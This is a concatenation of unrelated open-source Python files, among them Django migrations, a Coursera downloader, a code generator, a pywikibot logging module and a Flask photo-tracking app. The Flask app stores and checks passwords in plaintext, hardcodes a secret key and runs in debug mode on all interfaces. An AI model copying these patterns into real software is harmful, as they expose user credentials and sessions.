self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor atom 2 symbol"][13], "Mg")
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor atom 2 number"][13], 3)
def test_NBO5_vs_NBO7_hybridization_character(self):
data5 = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "nbo5_1.qout")).data
data7 = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "nbo7_1.qout")).data
self.assertEqual(
len(data5["nbo_data"]["hybridization_character"]), len(data7["nbo_data"]["hybridization_character"])
)
self.assertEqual(
data5["nbo_data"]["hybridization_character"][3]["atom 2 pol coeff"][9],
data7["nbo_data"]["hybridization_character"][3]["atom 2 pol coeff"][9],
)
self.assertEqual(
data5["nbo_data"]["hybridization_character"][0]["s"][0],
data7["nbo_data"]["hybridization_character"][0]["s"][0],
)
self.assertEqual(data5["nbo_data"]["hybridization_character"][1]["bond index"][7], "149")
self.assertEqual(data7["nbo_data"]["hybridization_character"][1]["bond index"][7], "21")
if __name__ == "__main__":
unittest.main()
|
materialsproject/pymatgen
|
pymatgen/io/qchem/tests/test_outputs.py
|
Python
|
mit
| 12,614
|
# Generated by Django 2.0.4 on 2018-04-23 18:09
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('slug', models.SlugField(blank=True, max_length=150, verbose_name='Slug')),
('photo', models.ImageField(blank=True, upload_to='accounts/profiles', verbose_name='Foto')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'Usuario',
'verbose_name_plural': 'Usuarios',
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
|
snicoper/django-boilerplate
|
src/apps/accounts/migrations/0001_initial.py
|
Python
|
mit
| 3,042
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-06-30 12:30
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('features', '0009_merge_20170613_1205'),
]
operations = [
migrations.AddField(
model_name='calculation',
name='features',
field=models.ManyToManyField(blank=True, to='features.Feature'),
),
]
|
KDD-OpenSource/fexum
|
features/migrations/0010_calculation_features.py
|
Python
|
mit
| 484
|
## Coursera_Downloader
## MIT License, 2014 Gurjot S. Sidhu
## Runs on Python 3.x using the urllib module
import time
import urllib.request as urr
import os
from shutil import copyfileobj
# Enter the link to the directory where you want the downloaded files to be saved
download_directory = "/home/user/Lectures"
# Enter the download url
link = "https://class.coursera.org/algo-004/lecture/download.mp4?lecture_id="
# Enter the increment for the ticker according to the pattern
ticker = 2
# Set a buffer time based on file size and download speed
buffer_time = 400
# OPTIONAL : If you don't want the downloaded files to have their original lecture names, you can name them as Lecture 1,2,3 ... (Although I have no idea why anyone would want to do that)
retain_original_names = True
## Kick back and relax
os.chdir(download_directory)
def download():
count = 0
# Set the limits of the range according to the "id" keys
for i in range(1, 2000):
count += 1
try:
if retain_original_names:
urr.urlretrieve(link + str(i))
else:
urr.urlretrieve(link + str(i), "Lecture " + str(count))
except AttributeError:
with urr.urlopen(link + str(i)) as in_data, open("Lecture " + str(count), 'wb') as out_video:
copyfileobj(in_data, out_video)
i += ticker
time.sleep(buffer_time)
print (str(count) + " videos have been downloaded.")
# Removing any temporary files left behind
urr.urlcleanup()
##############################################################################################################
## Known Issues
## If the downloaded files are named "Lecture 1,2,3 ..." even though retain_original_names is set to True -
## 1. Python Org as finally deprecated the urlretrieve attribute
## 2. I still haven't figured out how to scrape Coursera's website
##############################################################################################################
|
gsidhu/Coursera_Downloader
|
downloader_v3x.py
|
Python
|
mit
| 1,939
|
# encoding: UTF-8
from __future__ import print_function
__author__ = 'CHENXY'
from string import join
from xtp_struct_quote import structDict
from xtp_struct_common import structDict as structDict2
structDict.update(structDict2)
#----------------------------------------------------------------------
def replaceTabs(f):
"""把Tab用4个空格替代"""
l = []
for line in f:
line = line.replace('\t', ' ')
l.append(line)
return l
def processCallBack(line):
orignalLine = line
line = line.replace(' virtual void ', '') # 删除行首的无效内容
line = line.replace('{};\n', '') # 删除行尾的无效内容
content = line.split('(')
cbName = content[0] # 回调函数名称
cbName = cbName.strip()
cbArgs = content[1] # 回调函数参数
if cbArgs[-1] == ' ':
cbArgs = cbArgs.replace(') ', '')
else:
cbArgs = cbArgs.replace(')', '')
cbArgsList = cbArgs.split(', ') # 将每个参数转化为列表
cbArgsTypeList = []
cbArgsValueList = []
for arg in cbArgsList: # 开始处理参数
content = arg.split(' ')
if len(content) > 1:
cbArgsTypeList.append(content[0]) # 参数类型列表
cbArgsValueList.append(content[1]) # 参数数据列表
createTask(cbName, cbArgsTypeList, cbArgsValueList, orignalLine)
createProcess(cbName, cbArgsTypeList, cbArgsValueList)
# 生成.h文件中的process部分
process_line = 'void process' + cbName[2:] + '(Task *task);\n'
fheaderprocess.write(process_line)
fheaderprocess.write('\n')
# 生成.h文件中的on部分
#if 'OnRspError' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict error, int id, bool last) {};\n'
#elif 'OnRsp' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict data, dict error, int id, bool last) {};\n'
#elif 'OnRtn' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict data) {};\n'
#elif 'OnErrRtn' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict data, dict error) {};\n'
#else:
#on_line = ''
if line.count('*') == 1:
on_line = 'virtual void on' + cbName[2:] + '(dict data) {};\n'
elif line.count('*') == 2:
on_line = 'virtual void on' + cbName[2:] + '(dict data, dict error, bool last) {};\n'
elif line.count('*') == 0:
on_line = 'virtual void on' + cbName[2:] + '() {};\n'
else:
on_line = ''
fheaderon.write(on_line)
fheaderon.write('\n')
# 生成封装部分
createWrap(cbName, line)
#----------------------------------------------------------------------
def createWrap(cbName, line):
"""在Python封装段代码中进行处理"""
# 生成.h文件中的on部分
#if 'OnRspError' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict error, int id, bool last)\n'
#override_line = '("on' + cbName[2:] + '")(error, id, last);\n'
#elif 'OnRsp' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict data, dict error, int id, bool last)\n'
#override_line = '("on' + cbName[2:] + '")(data, error, id, last);\n'
#elif 'OnRtn' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict data)\n'
#override_line = '("on' + cbName[2:] + '")(data);\n'
#elif 'OnErrRtn' in cbName:
#on_line = 'virtual void on' + cbName[2:] + '(dict data, dict error)\n'
#override_line = '("on' + cbName[2:] + '")(data, error);\n'
#else:
#on_line = ''
if line.count('*') == 1:
on_line = 'virtual void on' + cbName[2:] + '(dict data)\n'
override_line = '("on' + cbName[2:] + '")(data);\n'
elif line.count('*') == 2:
on_line = 'virtual void on' + cbName[2:] + '(dict data, dict error, bool last)\n'
override_line = '("on' + cbName[2:] + '")(data, error, last);\n'
elif line.count('*') == 0:
on_line = 'virtual void on' + cbName[2:] + '()\n'
override_line = '("on' + cbName[2:] + '")();\n'
else:
on_line = ''
if on_line is not '':
fwrap.write(on_line)
fwrap.write('{\n')
fwrap.write(' try\n')
fwrap.write(' {\n')
fwrap.write(' this->get_override'+override_line)
fwrap.write(' }\n')
fwrap.write(' catch (error_already_set const &)\n')
fwrap.write(' {\n')
fwrap.write(' PyErr_Print();\n')
fwrap.write(' }\n')
fwrap.write('};\n')
fwrap.write('\n')
def createTask(cbName, cbArgsTypeList, cbArgsValueList, orignalLine):
# 从回调函数生成任务对象,并放入队列
funcline = orignalLine.replace(' virtual void ', 'void ' + apiName + '::')
funcline = funcline.replace('{};', '')
ftask.write(funcline)
ftask.write('{\n')
ftask.write(" Task* task = new Task();\n")
ftask.write(" task->task_name = " + cbName.upper() + ";\n")
# define常量
global define_count
fdefine.write("#define " + cbName.upper() + ' ' + str(define_count) + '\n')
define_count = define_count + 1
# switch段代码
fswitch.write("case " + cbName.upper() + ':\n')
fswitch.write("{\n")
fswitch.write(" this->" + cbName.replace('On', 'process') + '(task);\n')
fswitch.write(" break;\n")
fswitch.write("}\n")
fswitch.write("\n")
for i, type_ in enumerate(cbArgsTypeList):
if type_ == 'int':
ftask.write(" task->task_id = " + cbArgsValueList[i] + ";\n")
elif type_ == 'bool':
ftask.write(" task->task_last = " + cbArgsValueList[i] + ";\n")
elif 'XTPRI' in type_:
ftask.write("\n")
ftask.write(" if (error_info)\n")
ftask.write(" {\n")
ftask.write(" " + type_ + ' *task_error = new ' + type_ + '();\n')
ftask.write(" " + '*task_error = ' + cbArgsValueList[i] + ';\n')
ftask.write(" task->task_error = task_error;\n")
ftask.write(" }\n")
ftask.write("\n")
else:
ftask.write("\n")
ftask.write(" if (" + cbArgsValueList[i][1:] + ")\n")
ftask.write(" {\n")
ftask.write(" " + type_ + ' *task_data = new ' + type_ + '();\n')
ftask.write(" " + '*task_data = ' + cbArgsValueList[i] + ';\n')
ftask.write(" task->task_data = task_data;\n")
ftask.write(" }\n")
ftask.write(" this->task_queue.push(task);\n")
ftask.write("};\n")
ftask.write("\n")
def createProcess(cbName, cbArgsTypeList, cbArgsValueList):
# 从队列中提取任务,并转化为python字典
fprocess.write("void " + apiName + '::' + cbName.replace('On', 'process') + '(Task *task)' + "\n")
fprocess.write("{\n")
fprocess.write(" PyLock lock;\n")
onArgsList = []
for i, type_ in enumerate(cbArgsTypeList):
if 'XTPRI' in type_:
fprocess.write(" "+ "dict error;\n")
fprocess.write(" if (task->task_error)\n")
fprocess.write(" {\n")
fprocess.write(" "+ type_ + ' *task_error = (' + type_ + '*) task->task_error;\n')
struct = structDict[type_]
for key in struct.keys():
fprocess.write(" "+ 'error["' + key + '"] = task_error->' + key + ';\n')
fprocess.write(" delete task->task_error;\n")
fprocess.write(" }\n")
fprocess.write("\n")
onArgsList.append('error')
elif type_ in structDict:
fprocess.write(" "+ "dict data;\n")
fprocess.write(" if (task->task_data)\n")
fprocess.write(" {\n")
fprocess.write(" "+ type_ + ' *task_data = (' + type_ + '*) task->task_data;\n')
struct = structDict[type_]
for key, value in struct.items():
if value != 'enum':
fprocess.write(" "+ 'data["' + key + '"] = task_data->' + key + ';\n')
else:
fprocess.write(" "+ 'data["' + key + '"] = (int)task_data->' + key + ';\n')
fprocess.write(" delete task->task_data;\n")
fprocess.write(" }\n")
fprocess.write("\n")
onArgsList.append('data')
elif type_ == 'bool':
onArgsList.append('task->task_last')
elif type_ == 'int':
onArgsList.append('task->task_id')
onArgs = join(onArgsList, ', ')
fprocess.write(' this->' + cbName.replace('On', 'on') + '(' + onArgs +');\n')
fprocess.write(' delete task;\n')
fprocess.write("};\n")
fprocess.write("\n")
def processFunction(line):
line = line.replace(' virtual int ', '') # 删除行首的无效内容
line = line.replace(') = 0;\n', '') # 删除行尾的无效内容
content = line.split('(')
fcName = content[0] # 回调函数名称
fcArgs = content[1] # 回调函数参数
fcArgs = fcArgs.replace(')', '')
fcArgsList = fcArgs.split(', ') # 将每个参数转化为列表
fcArgsTypeList = []
fcArgsValueList = []
for arg in fcArgsList: # 开始处理参数
content = arg.split(' ')
if len(content) > 1:
fcArgsTypeList.append(content[0]) # 参数类型列表
fcArgsValueList.append(content[1]) # 参数数据列表
if len(fcArgsTypeList)>0 and fcArgsTypeList[0] in structDict:
createFunction(fcName, fcArgsTypeList, fcArgsValueList)
# 生成.h文件中的主动函数部分
if 'Req' in fcName:
req_line = 'int req' + fcName[3:] + '(dict req, int nRequestID);\n'
fheaderfunction.write(req_line)
fheaderfunction.write('\n')
def createFunction(fcName, fcArgsTypeList, fcArgsValueList):
type_ = fcArgsTypeList[0]
struct = structDict[type_]
ffunction.write('int QuoteApi::req' + fcName[3:] + '(dict req, int nRequestID)\n')
ffunction.write('{\n')
ffunction.write(' ' + type_ +' myreq = ' + type_ + '();\n')
ffunction.write(' memset(&myreq, 0, sizeof(myreq));\n')
for key, value in struct.items():
if value == 'string':
line = ' getString(req, "' + key + '", myreq.' + key + ');\n'
elif value == 'char':
line = ' getChar(req, "' + key + '", &myreq.' + key + ');\n'
elif value == 'int':
line = ' getInt(req, "' + key + '", &myreq.' + key + ');\n'
elif value == 'double':
line = ' getDouble(req, "' + key + '", &myreq.' + key + ');\n'
ffunction.write(line)
ffunction.write(' int i = this->api->' + fcName + '(&myreq, nRequestID);\n')
ffunction.write(' return i;\n')
ffunction.write('};\n')
ffunction.write('\n')
#########################################################
apiName = 'QuoteApi'
fcpp = open('xtp_quote_api.h', 'r')
ftask = open('xtp_md_task.cpp', 'w')
fprocess = open('xtp_md_process.cpp', 'w')
ffunction = open('xtp_md_function.cpp', 'w')
fdefine = open('xtp_md_define.cpp', 'w')
fswitch = open('xtp_md_switch.cpp', 'w')
fheaderprocess = open('xtp_md_header_process.h', 'w')
fheaderon = open('xtp_md_header_on.h', 'w')
fheaderfunction = open('xtp_md_header_function.h', 'w')
fwrap = open('xtp_md_wrap.cpp', 'w')
define_count = 1
for line in replaceTabs(fcpp):
if "virtual void On" in line:
processCallBack(line)
elif "virtual int" in line:
processFunction(line)
fcpp.close()
ftask.close()
fprocess.close()
ffunction.close()
fswitch.close()
fdefine.close()
fheaderprocess.close()
fheaderon.close()
fheaderfunction.close()
fwrap.close()
print('md functions done')
|
rrrrrr8/vnpy
|
vnpy/api/xtp/pyscript/generate_md_functions.py
|
Python
|
mit
| 12,218
|
#!/usr/bin/env python
import os, sys, re, csv,subprocess
def sharpen_image(img, destdir=None):
import subprocess,re,os,sys
regex_coded = re.compile(r'^.+?/[1-9][0-9]{8}_[1-6]\.jpg$')
regex_alt = re.compile(r'^.+?/[1-9][0-9]{8}_\w+?0[1-6]\.[JjPpNnGg]{3}$')
regex_valid_style = re.compile(r'^.+?/[1-9][0-9]{8}_?.*?\.[JjPpNnGg]{3}$')
if not destdir:
destdir = os.path.dirname(img)
#imgdestpng_out = os.path.join(tmp_processing, os.path.basename(imgsrc_jpg))
os.chdir(os.path.dirname(img))
format = img.split('.')[-1]
os.chdir(os.path.dirname(img))
## Destination name
if not destdir:
destdir = os.path.abspath('.')
else:
destdir = os.path.abspath(destdir)
outfile = os.path.join(destdir, img.split('/')[-1].split('.')[0] + '.png')
subprocess.call([
'convert',
'-format',
format,
"-colorspace",
"LAB",
img,
'-define',
'png:preserve-colormap',
'-define',
'png:format\=png24',
'-define',
'png:compression-level\=N',
'-define',
'png:compression-strategy\=N',
'-define',
'png:compression-filter\=N',
'-format',
'png',
# "-filter",
# "Spline",
'-unsharp',
"-1x1.2+0.50+0.0087",
"-colorspace",
"sRGB",
'-quality',
'95',
os.path.abspath(img)
])
#os.rename(img,outfile)
print 'Done {}'.format(img)
return os.path.join(destdir, img.split('/')[-1].split('.')[0] + '.png')
if __name__ == '__main__':
sharpen_image(img, destdir=None)
|
relic7/prodimages
|
python/do_sharpen_only_img.py
|
Python
|
mit
| 1,816
|
import os
import base64
from sqlite3 import dbapi2 as sqlite3
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash
current_location = os.path.dirname(os.path.realpath(__file__))+'/'
app = Flask(__name__)
# Load default config and override config from an environment variable
app.config.update(dict(
DATABASE=current_location + 'db/database.sqlite',
DEBUG=True,
SECRET_KEY='development key',
))
app.config.from_envvar('FLASKR_SETTINGS', silent=True)
## --- database-related stuff ---
def connect_db():
"""Connects to the specific database."""
rv = sqlite3.connect(app.config['DATABASE'])
rv.row_factory = sqlite3.Row
return rv
def init_db():
"""Creates the database tables."""
with app.app_context():
new_db = False
if not os.path.exists(app.config['DATABASE']):
new_db = True
db = get_db()
if new_db:
with app.open_resource('db/schema.sql', mode='r') as f:
db.cursor().executescript(f.read())
db.commit()
def get_db():
"""Opens a new database connection if there is none yet for the
current application context.
"""
if not hasattr(g, 'sqlite_db'):
g.sqlite_db = connect_db()
return g.sqlite_db
@app.teardown_appcontext
def close_db(error):
"""Closes the database again at the end of the request."""
if hasattr(g, 'sqlite_db'):
g.sqlite_db.close()
## ---
def new_file_name(i = 0):
location = 'static/photos/'+str(i)+'.jpg'
if os.path.exists(location):
return new_file_name(i + 1)
else:
return location
# Utility page to load static files
@app.route('/static/<path:filename>')
def static_files(filename):
return send_from_directory('static/', filename)
# Login page
@app.route('/', methods=['GET'])
def login():
return render_template('login.html')
# Check login
@app.route('/', methods=['POST'])
def do_login():
db = get_db()
username = request.form['username']
password = request.form['password']
credentials = db.execute('SELECT id_person FROM person WHERE username=? AND password=?', [username, password]).fetchone()
if credentials == None:
flash("Invalid Log In")
return render_template('login.html')
else:
session['logged_in'] = True
session['username'] = username
session['user_id'] = credentials[0]
return redirect(url_for('record'))
# Logout Page
@app.route('/logout')
def logout():
if 'username' not in session:
return redirect(url_for('login'))
session.pop('logged_in', None)
session.pop('username', None)
flash('You were logged out')
return redirect(url_for('login'))
# Page for registration
@app.route('/register', methods=['GET'])
def register():
return render_template('register.html')
@app.route('/register', methods=['POST'])
def do_register():
db = get_db()
username = request.form['username']
password = request.form['password']
password2 = request.form['password2']
user = db.execute("SELECT * FROM person WHERE username=?", [username]).fetchone()
if user != None:
flash("Username is already taken")
return render_template('register.html')
if password != password2:
flash('Error - passwords did not match!')
return render_template('register.html')
else:
db.execute('INSERT INTO person (username, password) VALUES (?, ?)', (username, password))
db.commit()
return render_template('login.html')
# Default page that allows user to take pictures and upload them
@app.route("/record")
def record():
if 'username' not in session:
return redirect(url_for('login'))
return render_template('record.htm')
# Page for server to receive photos
@app.route('/receive_photo/', methods=['POST'])
def receive_photo():
if 'username' not in session:
return redirect(url_for('login'))
# Save photo
file_location = new_file_name()
f = open(file_location, 'wb')
raw_data = request.form['img']
cleaned_data = raw_data[raw_data.find(',')+1:]
f.write(base64.decodestring(cleaned_data))
f.close()
user_id = session['user_id']
db = get_db()
db.execute('INSERT INTO food (file_location, trackperson, annotation) VALUES (?, ?, ?)',
[file_location, user_id, ''])
db.commit()
return ''
# Page for users to annotate photos
@app.route('/annotate/', methods=['GET'])
def annotate():
if 'username' not in session:
return redirect(url_for('login'))
id_food = request.args.get('id_food')
db = get_db()
if id_food == None:
food = db.execute('SELECT * FROM food WHERE annotation="" AND trackperson=? ORDER BY id_food DESC LIMIT 1', [session['user_id']]).fetchone()
else:
food = db.execute('SELECT * FROM food WHERE id_food=? AND trackperson=? ORDER BY id_food DESC LIMIT 1', [id_food, session['user_id']]).fetchone()
if food == None:
return render_template('annotate.htm', no_pictures=True)
food = dict(food)
food['user'] = session['username']
return render_template('annotate.htm', **food)
# Page To Save annotations
@app.route('/annotate/', methods=['POST'])
def save_annotation():
if 'username' not in session:
return redirect(url_for('login'))
id_food = request.form['id_food']
annotation = request.form['annotation']
db = get_db()
db.execute('UPDATE food SET annotation=? WHERE id_food=?',
[annotation, id_food])
db.commit()
return redirect(url_for('annotate'))
@app.route("/wellness", methods=['GET'])
def wellness():
if 'username' not in session:
return redirect(url_for('login'))
return render_template('wellness.htm')
@app.route("/wellness", methods=['POST'])
def add_wellness():
if 'username' not in session:
return redirect(url_for('login'))
return redirect(url_for('add_wellness'))
# Page for users to see their history
@app.route('/history/')
def history():
if 'username' not in session:
return redirect(url_for('login'))
user_id = str(session['user_id'])
db = get_db()
cur = db.execute('SELECT * FROM food WHERE trackperson=? ORDER BY id_food', [user_id])
entries = cur.fetchall()
return render_template('history.htm', entries=entries)
@app.route("/delete/")
def delete():
if 'username' not in session:
return redirect(url_for('login'))
id_food = request.args.get('id_food')
user_id = session['user_id']
db = get_db()
db.execute('DELETE FROM food WHERE id_food=? AND trackperson=?', [id_food, user_id])
db.commit()
return redirect(url_for('history'))
if __name__ == "__main__":
init_db()
app.run(debug=True, host='0.0.0.0', port=9001)
|
almlab/microbiome-tracker
|
src/serve.py
|
Python
|
mit
| 6,821
|
#!/usr/bin/env python
import os
import shutil
import datetime
from pathlib import Path
PROJECT_DIRECTORY = os.path.realpath(os.path.curdir)
def remove_file(filepath):
f = Path(PROJECT_DIRECTORY) / filepath
if f.is_dir():
shutil.rmtree(str(f))
else:
f.unlink()
def replace_contents(filename, what, replacement):
with filename.open() as fh:
changelog = fh.read()
with filename.open('w') as fh:
fh.write(changelog.replace(what, replacement))
def copytree(src, dst, symlinks=False, ignore=None):
if not os.path.exists(dst):
os.makedirs(dst)
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if os.path.isdir(s):
copytree(s, d, symlinks, ignore)
else:
if (not os.path.exists(d) or
os.stat(s).st_mtime - os.stat(d).st_mtime > 1):
shutil.copy2(s, d)
if __name__ == "__main__":
today = datetime.date.today()
if '{{ cookiecutter.use_github }}' == 'yes':
remove_file('.hgignore')
if not Path(".git").exists():
os.system("git init .")
shutil.move("git-commit-msg", ".git/hooks/commit-msg")
else:
remove_file('.gitignore')
remove_file('git-commit-msg')
for path in [Path("HISTORY.rst"),
Path('{{ cookiecutter.py_module }}') / "__about__.py",
Path('docs') / 'conf.py',
]:
replace_contents(path, '<TODAY>', today.strftime("%Y-%m-%d"))
replace_contents(path, '<YEAR>', today.strftime("%Y"))
tox_envlist = []
for py, on in [("py26", "{{ cookiecutter.py26 }}"),
("py27", "{{ cookiecutter.py27 }}"),
("py33", "{{ cookiecutter.py33 }}"),
("py34", "{{ cookiecutter.py34 }}"),
("py35", "{{ cookiecutter.py35 }}"),
("py36", "{{ cookiecutter.py36 }}"),
("py37", "{{ cookiecutter.py37 }}"),
("pypy", "{{ cookiecutter.pypy }}"),
("pypy3", "{{ cookiecutter.pypy3 }}"),
]:
if on == "yes":
tox_envlist.append(py)
replace_contents(Path("tox.ini"), '@TOX_ENVLIST@',
", ".join(tox_envlist))
if '{{ cookiecutter.use_travis_ci }}' == 'no':
remove_file('.travis.yml')
if '{{ cookiecutter.use_pypi_deployment_with_travis }}' == 'no':
remove_file('travis_pypi_setup.py')
if '{{ cookiecutter.use_paver }}' == 'no':
remove_file('pavement.py')
if '{{ cookiecutter.use_make }}' == 'no':
remove_file('Makefile')
for f in Path("licenses").iterdir():
f.unlink()
Path("licenses").rmdir()
if "{{ cookiecutter.src_dir }}" != ".":
src_d = Path("{{ cookiecutter.src_dir}}")
if not src_d.exists():
src_d.mkdir(parents=True)
copytree("{{ cookiecutter.py_module }}",
str(src_d / "{{ cookiecutter.py_module }}"))
copytree("tests", str(src_d / "tests"))
shutil.rmtree("{{ cookiecutter.py_module }}")
shutil.rmtree("tests")
domain = "{{ cookiecutter.gettext_domain }}"
if domain == "None":
shutil.rmtree("locale")
else:
gk = Path("locale/.gitkeep")
if gk.exists():
gk.unlink()
if '{{ cookiecutter.add_docs }}' == 'no':
remove_file('docs')
if '{{ cookiecutter.requirements_yaml }}' == 'no':
remove_file('requirements')
|
nicfit/nicfit.py
|
cookiecutter/hooks/post_gen_project.py
|
Python
|
mit
| 3,552
|
# -*- coding: utf-8 -*-
"""Logging functions."""
#
# (C) Pywikibot team, 2010-2020
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import logging
import os
import sys
# logging levels
from logging import DEBUG, INFO, WARNING, ERROR, CRITICAL, StreamHandler
STDOUT = 16
VERBOSE = 18
INPUT = 25
if sys.version_info[0] > 2:
unicode = str
_init_routines = []
_inited_routines = set()
def add_init_routine(routine):
"""Add a routine to be run as soon as possible."""
_init_routines.append(routine)
def _init():
"""Init any routines which have not already been called."""
for init_routine in _init_routines:
if init_routine not in _inited_routines:
init_routine()
_inited_routines.add(init_routine)
# Clear the list of routines to be inited
_init_routines[:] = [] # the global variable is used with slice operator
# User output/logging functions
# Six output functions are defined. Each requires a unicode or string
# argument. All of these functions generate a message to the log file if
# logging is enabled ("-log" or "-debug" command line arguments).
# The functions output(), stdout(), warning(), and error() all display a
# message to the user through the logger object; the only difference is the
# priority level, which can be used by the application layer to alter the
# display. The stdout() function should be used only for data that is
# the "result" of a script, as opposed to information messages to the
# user.
# The function log() by default does not display a message to the user, but
# this can be altered by using the "-verbose" command line option.
# The function debug() only logs its messages, they are never displayed on
# the user console. debug() takes a required second argument, which is a
# string indicating the debugging layer.
def logoutput(text, decoder=None, newline=True, _level=INFO, _logger='',
**kwargs):
"""Format output and send to the logging module.
Helper function used by all the user-output convenience functions.
"""
if _logger:
logger = logging.getLogger('pywiki.' + _logger)
else:
logger = logging.getLogger('pywiki')
if not logger.handlers: # lastResort for Python 2 (T188417)
logger.handlers.append(StreamHandler())
# invoke any init routines
if _init_routines:
_init()
# frame 0 is logoutput() in this module,
# frame 1 is the convenience function (output(), etc.)
# frame 2 is whatever called the convenience function
frame = sys._getframe(2)
module = os.path.basename(frame.f_code.co_filename)
context = {'caller_name': frame.f_code.co_name,
'caller_file': module,
'caller_line': frame.f_lineno,
'newline': ('\n' if newline else '')}
if decoder:
text = text.decode(decoder)
elif not isinstance(text, unicode):
if not isinstance(text, str):
# looks like text is a non-text object.
# Maybe it has a __unicode__ builtin ?
# (allows to print Page, Site...)
text = unicode(text)
else:
try:
text = text.decode('utf-8')
except UnicodeDecodeError:
text = text.decode('iso8859-1')
logger.log(_level, text, extra=context, **kwargs)
def output(text, decoder=None, newline=True, toStdout=False, **kwargs):
r"""Output a message to the user via the userinterface.
Works like print, but uses the encoding used by the user's console
(console_encoding in the configuration file) instead of ASCII.
If decoder is None, text should be a unicode string. Otherwise it
should be encoded in the given encoding.
If newline is True, a line feed will be added after printing the text.
If toStdout is True, the text will be sent to standard output,
so that it can be piped to another process. All other text will
be sent to stderr. See: https://en.wikipedia.org/wiki/Pipeline_%28Unix%29
text can contain special sequences to create colored output. These
consist of the escape character \03 and the color name in curly braces,
e. g. \03{lightpurple}. \03{default} resets the color. By using the
color_format method from pywikibot.tools.formatter, the escape character
may be omitted.
Other keyword arguments are passed unchanged to the logger; so far, the
only argument that is useful is "exc_info=True", which causes the
log message to include an exception traceback.
"""
if toStdout: # maintained for backwards-compatibity only
from pywikibot.tools import issue_deprecation_warning
issue_deprecation_warning('"toStdout" parameter',
'pywikibot.stdout()', since='20160228')
logoutput(text, decoder, newline, STDOUT, **kwargs)
else:
logoutput(text, decoder, newline, INFO, **kwargs)
def stdout(text, decoder=None, newline=True, **kwargs):
"""Output script results to the user via the userinterface."""
logoutput(text, decoder, newline, STDOUT, **kwargs)
def warning(text, decoder=None, newline=True, **kwargs):
"""Output a warning message to the user via the userinterface.
@param text: the message the user wants to display.
@type text: str
@param decoder: If None, text should be a unicode string. Otherwise it
should be encoded in the given encoding.
@type decoder: str
@param newline: If True, a line feed will be added after printing the text.
@type newline: bool
@param kwargs: The keyword arguments can be found in the python doc:
https://docs.python.org/3/howto/logging-cookbook.html.
"""
logoutput(text, decoder, newline, WARNING, **kwargs)
def error(text, decoder=None, newline=True, **kwargs):
"""Output an error message to the user via the userinterface."""
logoutput(text, decoder, newline, ERROR, **kwargs)
def log(text, decoder=None, newline=True, **kwargs):
"""Output a record to the log file."""
logoutput(text, decoder, newline, VERBOSE, **kwargs)
def critical(text, decoder=None, newline=True, **kwargs):
"""Output a critical record to the user via the userinterface."""
logoutput(text, decoder, newline, CRITICAL, **kwargs)
def debug(text, layer, decoder=None, newline=True, **kwargs):
"""Output a debug record to the log file.
@param layer: The name of the logger that text will be sent to.
"""
logoutput(text, decoder, newline, DEBUG, layer, **kwargs)
def exception(msg=None, decoder=None, newline=True, tb=False, **kwargs):
"""Output an error traceback to the user via the userinterface.
Use directly after an 'except' statement::
...
except Exception:
pywikibot.exception()
...
or alternatively::
...
except Exception as e:
pywikibot.exception(e)
...
@param tb: Set to True in order to output traceback also.
"""
if isinstance(msg, BaseException):
exc_info = 1
else:
exc_info = sys.exc_info()
msg = '%s: %s' % (
repr(exc_info[1]).split('(')[0], unicode(exc_info[1]).strip())
if tb:
kwargs['exc_info'] = exc_info
logoutput(msg, decoder, newline, ERROR, **kwargs)
|
PersianWikipedia/pywikibot-core
|
pywikibot/logging.py
|
Python
|
mit
| 7,378
|
from shopify.utils import shop_url
from test.test_helper import TestCase
class TestSanitizeShopDomain(TestCase):
def test_returns_hostname_for_good_shop_domains(self):
good_shop_domains = [
"my-shop",
"my-shop.myshopify.com",
"http://my-shop.myshopify.com",
"https://my-shop.myshopify.com",
]
sanitized_shops = [shop_url.sanitize_shop_domain(shop_domain) for shop_domain in good_shop_domains]
self.assertTrue(all(shop == "my-shop.myshopify.com" for shop in sanitized_shops))
